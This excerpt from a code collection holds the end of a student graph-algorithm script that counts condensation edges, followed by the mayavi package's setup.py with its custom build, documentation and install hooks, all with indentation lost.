if color[v] == 0:
cnt += 1
dfs_2(v, color, cnt, g_back)
ribs = []
for _ in range(max(color)):
ribs.append(set())
for v in range(n):
for u in g[v]:
if color[v] != color[u]:
ribs[color[v]].add(color[u])
result = 0
for r in ribs:
result += len(r)
print(result)
if __name__ == "__main__":
threading.Thread(target=main).start()
|
AverPower/Algorithms_and_Structures
|
10. Graphs - 1/Task D.py
|
Task D.py
|
py
| 1,435 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30354475241
|
import setuptools
from setuptools import Command
try:
import numpy
from numpy.distutils.command import build, install_data, build_src
from numpy.distutils.core import setup
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
from distutils.command import build, install_data
from distutils.core import setup
import io
import os
import time
import subprocess
import shutil
import re
import sys
import traceback
from os.path import (abspath, basename, dirname, exists, getmtime, isdir,
join, split)
from distutils.command import clean
from distutils import log
from setuptools.command import develop
MODE = 'normal'
if len(sys.argv) >= 2 and \
('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean', 'sdist')):
MODE = 'info'
info = {}
fname = join('mayavi', '__init__.py')
exec(compile(open(fname).read(), fname, 'exec'), info)
DEFAULT_HTML_TARGET_DIR = join('docs', 'build')
DEFAULT_INPUT_DIR = join('docs', 'source',)
class GenDocs(Command):
description = (
"This command generates generated part of the documentation "
"when needed. It's run automatically before a build_docs, and that's "
"the only time it needs to be run."
)
user_options = [
('None', None, 'this command has no options'),
]
def latest_modified(self, the_path, filetypes='', ignore_dirs=''):
"""Traverses a path looking for the most recently modified file
Parameters
----------
the_path : string
Contains path to be traversed or filename to be inspected.
filetypes : string
Regular expression pattern of files to examine. If specified, other
files are ignored. Otherwise, all files are examined.
ignore_dirs : string
Regular expression pattern of directories to be ignored. If ignore
specified, all directories are walked.
Returns
-------
latest_time : float
Modification time of latest_path.
latest_path : string
Most recently modified file.
        Description
        -----------
        Walks the_path looking for the most recently modified file that
        matches filetypes, skipping directories that match ignore_dirs; if
        the_path is a single file, its own modification time is returned.
        """
file_re = re.compile(filetypes)
dir_re = re.compile(ignore_dirs)
if not exists(the_path):
return 0, the_path
if isdir(the_path):
latest_time = 0
latest_path = the_path
for root, dirs, files in os.walk(the_path):
if ignore_dirs != '':
# This needs to iterate over a copy of the list. Otherwise,
# as things get removed from the original list, the indices
# become invalid.
for dir in dirs[:]:
if dir_re.search(dir):
dirs.remove(dir)
for file in files:
if filetypes != '':
if not file_re.search(file):
continue
current_file_time = getmtime(join(root, file))
if current_file_time > latest_time:
latest_time = current_file_time
latest_path = join(root, file)
return latest_time, latest_path
else:
return getmtime(the_path), the_path
def mlab_reference(self):
""" If mayavi is installed, run the mlab_reference generator.
"""
# XXX: This is really a hack: the script is not made to be used
# for different projects, but it ended up being. This part is
# mayavi-specific.
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = 'mayavi'
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified('mlab_reference.py')[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'mlab_reference.rst'))):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the mlab reference documentation")
os.system('python mlab_reference.py')
except:
pass
def example_files(self):
""" Generate the documentation files for the examples.
"""
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = join('examples', 'mayavi')
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
script_file_name = join('docs', 'source', 'render_examples.py')
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified(script_file_name)[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'examples.rst'))
):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the example list")
subprocess.call('python %s' %
basename(script_file_name), shell=True,
cwd=dirname(script_file_name))
except:
pass
def run(self):
self.mlab_reference()
self.example_files()
def initialize_options(self):
pass
def finalize_options(self):
pass
class BuildDocs(Command):
description = \
"This command generates the documentation by running Sphinx. " \
"It then zips the docs into an html.zip file."
user_options = [
('None', None, 'this command has no options'),
]
def make_docs(self):
if os.name == 'nt':
print("Please impelemnt sphinx building on windows here.")
else:
subprocess.call(['make', 'html'], cwd='docs')
def run(self):
self.make_docs()
def initialize_options(self):
pass
def finalize_options(self):
pass
# Functions to generate the docs
def list_doc_projects():
""" List the different source directories under DEFAULT_INPUT_DIR
for which we have docs.
"""
source_dir = join(abspath(dirname(__file__)),
DEFAULT_INPUT_DIR)
source_list = os.listdir(source_dir)
# Check to make sure we're using non-hidden directories.
source_dirs = [listing for listing in source_list
if isdir(join(source_dir, listing))
and not listing.startswith('.')]
return source_dirs
def list_docs_data_files(project):
""" List the files to add to a project by inspecting the
documentation directory. This works only if called after the
build step, as the files have to be built.
returns a list of (install_dir, [data_files, ]) tuples.
"""
project_target_dir = join(DEFAULT_HTML_TARGET_DIR, project, 'html')
return_list = []
for root, dirs, files in os.walk(project_target_dir, topdown=True):
# Modify inplace the list of directories to walk
dirs[:] = [d for d in dirs if not d.startswith('.')]
if len(files) == 0:
continue
install_dir = root.replace(project_target_dir, join(project, 'html'))
return_list.append((install_dir, [join(root, f) for f in files]))
return return_list
def _tvtk_built_recently(zipfile, delay):
"""Returns True if the TVTK classes in zipfile was built in the last
delay seconds.
"""
if not os.path.exists(zipfile):
return False
ctime = os.stat(zipfile).st_ctime
tdiff = time.time() - ctime
return tdiff < delay
# Our custom distutils hooks
def build_tvtk_classes_zip():
MY_DIR = os.path.dirname(__file__)
zipfile = os.path.join(MY_DIR, 'tvtk', 'tvtk_classes.zip')
if _tvtk_built_recently(zipfile, delay=120):
print("Already built tvtk_classes.zip")
return
else:
print("Building tvtk_classes.zip")
sys.path.insert(0, MY_DIR)
import tvtk
tvtk_dir = 'tvtk'
sys.path.insert(0, tvtk_dir)
from setup import gen_tvtk_classes_zip
gen_tvtk_classes_zip()
sys.path.remove(tvtk_dir)
sys.path.remove(MY_DIR)
class MyBuild(build.build):
""" A build hook to generate the documentation.
We sub-class numpy.distutils' build command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
build_tvtk_classes_zip()
build.build.run(self)
class MyBuildSrc(build_src.build_src):
"""Build hook to generate the TVTK ZIP files.
We do it here also because for editable installs, setup.py build is not
called.
"""
def run(self):
build_tvtk_classes_zip()
build_src.build_src.run(self)
class MyDevelop(develop.develop):
""" A hook to build the TVTK ZIP file on develop.
Subclassing setuptools' command because numpy.distutils doesn't
have an implementation.
"""
def run(self):
# Make sure that the 'build_src' command will
# always be inplace when we do a 'develop'.
self.reinitialize_command('build_src', inplace=1)
# tvtk_classes.zip always need to be created on 'develop'.
build_tvtk_classes_zip()
develop.develop.run(self)
class MyInstallData(install_data.install_data):
""" An install hook to copy the generated documentation.
We subclass numpy.distutils' command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
install_data_command = self.get_finalized_command('install_data')
for project in list_doc_projects():
install_data_command.data_files.extend(
list_docs_data_files(project))
# make sure tvtk_classes.zip always get created before putting it
# in the install data.
build_tvtk_classes_zip()
tvtk_dir = 'tvtk'
install_data_command.data_files.append(
(tvtk_dir, [join(tvtk_dir, 'tvtk_classes.zip')]))
install_data.install_data.run(self)
class MyClean(clean.clean):
"""Reimplements to remove the extension module array_ext to guarantee a
fresh rebuild every time. The module hanging around could introduce
problems when doing develop for a different vtk version."""
def run(self):
MY_DIR = os.path.dirname(__file__)
ext_file = os.path.join(
MY_DIR,
"tvtk",
"array_ext" + (".pyd" if sys.platform == "win32" else ".so")
)
if os.path.exists(ext_file):
print("Removing in-place array extensions {}".format(ext_file))
os.unlink(ext_file)
clean.clean.run(self)
# Configure our extensions to Python
def configuration(parent_package=None, top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(
ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True,
)
config.add_subpackage('tvtk')
config.add_data_dir('mayavi/core/lut')
config.add_data_dir('mayavi/tests/data')
config.add_data_dir('mayavi/tests/csv_files')
config.add_data_dir('mayavi/tools/static')
# Image files.
for pkgdir in ('mayavi', 'tvtk'):
for root, dirs, files in os.walk(pkgdir):
if split(root)[-1] == 'images':
config.add_data_dir(root)
# *.ini files.
config.add_data_dir('tvtk/plugins/scene')
config.add_data_dir('mayavi/preferences')
return config
###########################################################################
# Similar to package_data, but installed before build
build_package_data = {'mayavi.images': ['docs/source/mayavi/_static/m2_about.jpg']}
# Install our data files at build time. This is iffy,
# but we need to do this before distutils kicks in.
for package, files in build_package_data.items():
target_path = package.replace('.', os.sep)
for filename in files:
shutil.copy(filename, target_path)
###########################################################################
# Build the full set of packages by appending any found by setuptools'
# find_packages to those discovered by numpy.distutils.
if HAS_NUMPY:
config = configuration().todict()
else:
# This is just a dummy so the egg_info command works.
config = {'packages': []}
packages = setuptools.find_packages(exclude=config['packages'] +
['docs', 'examples'])
config['packages'] += packages
if MODE != 'info' and not HAS_NUMPY:
msg = '''
Numpy is required to build Mayavi correctly, please install it first.
'''
print('*'*80)
print(msg)
print('*'*80)
raise RuntimeError(msg)
# The actual setup call
if __name__ == '__main__':
setup(
name='mayavi',
version=info['__version__'],
author="Prabhu Ramachandran, et al.",
author_email="[email protected]",
maintainer='ETS Developers',
python_requires='>=3.8',
maintainer_email='[email protected]',
url='http://docs.enthought.com/mayavi/mayavi/',
classifiers=[c.strip() for c in """\
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Operating System :: MacOS
Operating System :: Microsoft :: Windows
Operating System :: OS Independent
Operating System :: POSIX
Operating System :: Unix
Programming Language :: C
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Topic :: Software Development :: Libraries
""".splitlines() if len(c.split()) > 0],
cmdclass={
# Work around a numpy distutils bug by forcing the use of the
# setuptools' sdist command.
'sdist': setuptools.command.sdist.sdist,
'build': MyBuild,
'build_src': MyBuildSrc,
'clean': MyClean,
'develop': MyDevelop,
'install_data': MyInstallData,
'gen_docs': GenDocs,
'build_docs': BuildDocs,
},
description='3D scientific data visualization library and application',
download_url=('https://www.github.com/enthought/mayavi'),
entry_points={
'gui_scripts': [
'mayavi2 = mayavi.scripts.mayavi2:main',
'tvtk_doc = tvtk.tools.tvtk_doc:main'
],
'envisage.plugins': [
'tvtk.scene = tvtk.plugins.scene.scene_plugin:ScenePlugin',
'tvtk.scene_ui = tvtk.plugins.scene.ui.scene_ui_plugin:SceneUIPlugin',
'tvtk.browser = tvtk.plugins.browser.browser_plugin:BrowserPlugin',
'mayavi = mayavi.plugins.mayavi_plugin:MayaviPlugin',
'mayavi_ui = mayavi.plugins.mayavi_ui_plugin:MayaviUIPlugin'
],
'tvtk.toolkits': [
'qt4 = tvtk.pyface.ui.qt4.init:toolkit_object',
'qt = tvtk.pyface.ui.qt4.init:toolkit_object',
'wx = tvtk.pyface.ui.wx.init:toolkit_object',
'null = tvtk.pyface.ui.null.init:toolkit_object',
]
},
extras_require=info['__extras_require__'],
include_package_data=True,
install_requires=info['__requires__'],
license="BSD",
long_description=io.open('README.rst', encoding='utf-8').read(),
platforms=["Windows", "Linux", "Mac OS-X", "Unix", "Solaris"],
zip_safe=False,
**config
)
|
enthought/mayavi
|
setup.py
|
setup.py
|
py
| 16,576 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|